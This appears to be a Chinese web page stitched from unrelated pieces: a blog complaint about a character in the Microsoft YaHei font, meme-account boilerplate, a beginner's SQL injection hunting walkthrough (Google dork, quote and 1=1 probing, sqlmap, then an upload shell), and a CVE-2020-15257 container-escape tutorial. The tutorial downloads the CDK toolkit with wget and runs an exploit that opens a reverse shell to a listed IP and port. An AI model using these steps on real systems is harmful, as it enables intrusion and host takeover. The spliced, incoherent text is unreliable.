“微软雅黑”字体的一个漏洞！
 

 
 
 

 
 
 

    “微软雅黑”是我最喜欢最常用的一种字体，它很像我以前搞美工时用排笔写成的美术字。但近日我偶然发现这种字体的一个漏洞！就是没有“演”字，而用“演”字来代替！这就出了大问题，因‘演’字平常语言中用得非常普遍，如表演，演示，演讲，演义，推演，演译，演祘，其中后2个词汇是我的专业数理逻辑用得非常普遍的，如命题演算，谓词演算，演译定理，等。我写的博客中有关数理逻辑的文章最多，共有90多个。现在要一一进行检查，工作量非常非常巨大！！！
 

 
 
 

          现在我将上面这一段文字一字不改地用 “微软雅黑” 重新发一遍，看有什么结果：
 

 
 
 

       “微软雅黑”是我最喜欢最常用的一种字体，它很像我以前搞美工时用排笔写成的美术字。但近日我偶然发现这种字体的一个漏洞！就是没有“演”字，而用“演”字来代替！这就出了大问题，因‘演’字平常语言中用得非常普遍，如表演，演示，演讲，演义，推演，演译，演祘，其中后2个词汇是我的专业数理逻辑用得非常普遍的，如命题演算，谓词演算，演译定理，等。我写的博客中有关数理逻辑的文章最多，共有90多个。现在要一一进行检查，工作量非常非常巨大！！！
 
 

 
 
 

    为防止微软公司将微软雅黑字体改正后上面这一段文字就看不到有错误，我特意将上面两段文字转换为以下这个BMP图像文件，以永久地记录这个历史性错误：
 

 
 
 

 
 
 

 
 
 

 
 
 

 注：上面第2和第4段中“就是没有‘演’字“一句中的‘演’字是普通黑体，不是微软雅黑，所以都没错。

 
 
（给程序员的那些事加星标，每天看趣图）
 


 
Firefox 在 Windows 发现了一个漏洞
 
↓↓↓
 

 
（汉化：Pomeian）
 
（此图被我们的六个微信读者推荐投稿啦）
 

 

 
往期趣图（点击下方图片可跳转阅读）
 


 

 

 

 


 


 
关注「程序员的那些事」加星标，每天看趣图
 

 
（商务合作QQ：2302462408）
 

作为一个资深安全菜鸟，主要是讲解常规挖洞的一个流程和思路，以找到的一个某公司sql注入为例，大佬轻喷
 网上很多资料及博客都有讲解，通过搜索引擎寻找网站漏洞，实际上整个挖洞的过程基本上是撞大运，掏出谷歌，搜索inurl:php?id=,实际上搜索的都是php网站，然后一个个测试。。。作为一个菜鸡也只能这样了
 
 往后面找，一个个测试
 
 这个一看就可能存在sql诸如，开始测试，单引号，and1=1,and 1=2一顿操作，
 and1=1页面正常
 
 1=2时页面错误
 
 基本上就可以确定存在sql了，作为一名菜鸡，直接掏出sqlmap，拿到数据库之后找后台，找到后台之后寻找上传点拿shell，大概的过程就是这样，奈何本人水平太菜搞不定

 
 
有在关注容器逃逸漏洞，最近在github上发现了一款零依赖Docker/K8s渗透工具包，集成了多个漏洞PoC/EXP，可轻松逃脱容器并接管K8s集群。
 
CDK- 零依赖Docker/K8s渗透工具包
 
CDK是一款为容器环境定制的渗透测试工具，在已攻陷的容器内部提供零依赖的常用命令及PoC/EXP。集成Docker/K8s场景特有的 逃逸、横向移动、持久化利用方式，插件化管理。
 
github项目地址：
 
https://github.com/Xyntax/CDK

 
下面以最近发布的容器逃逸漏洞 CVE-2020-15257作为演示漏洞利用过程。
 

 
漏洞简述：
 
当在docker使用–net=host参数启动，与宿主机共享net namespace时，容器中的攻击者可以绕过访问权限访问 containerd 的控制API 进而导致权限提升。
 
漏洞利用：
 
（1）安装有漏洞的containerd版本。
 
影响版本containerd< 1.3.9&&containerd < 1.4.3
 
#列出仓库中可用的版本，安装特定版本的 Docker Engine-Communityapt-cache madison docker-cesudo apt-get install docker-ce=<VERSION_STRING> docker-ce-cli=<VERSION_STRING> containerd.io=<VERSION_STRING>

 

 
（2）通过--net=host 作为启动参数来运行一个容器。

 
sudo docker run -it --net=host ubuntu:18.04 /bin/bash

 
在容器内执行 cat /proc/net/unix|grep -a "containerd-shim" 可看到抽象命名空间Unix域套接字。
 

 
（3）通过CDK执行exp，成功反弹shell，实现容器逃逸。
 
wget https://github.com/Xyntax/CDK/releases/download/0.1.6/cdk_v0.1.6_release.tar.gztar -zxvf cdk_v0.1.6_release.tar.gz ./cdk_linux_amd64 run shim-pwn 10.1.1.209 12345


 
参考链接：
 

  
https://www.cdxy.me/?p=837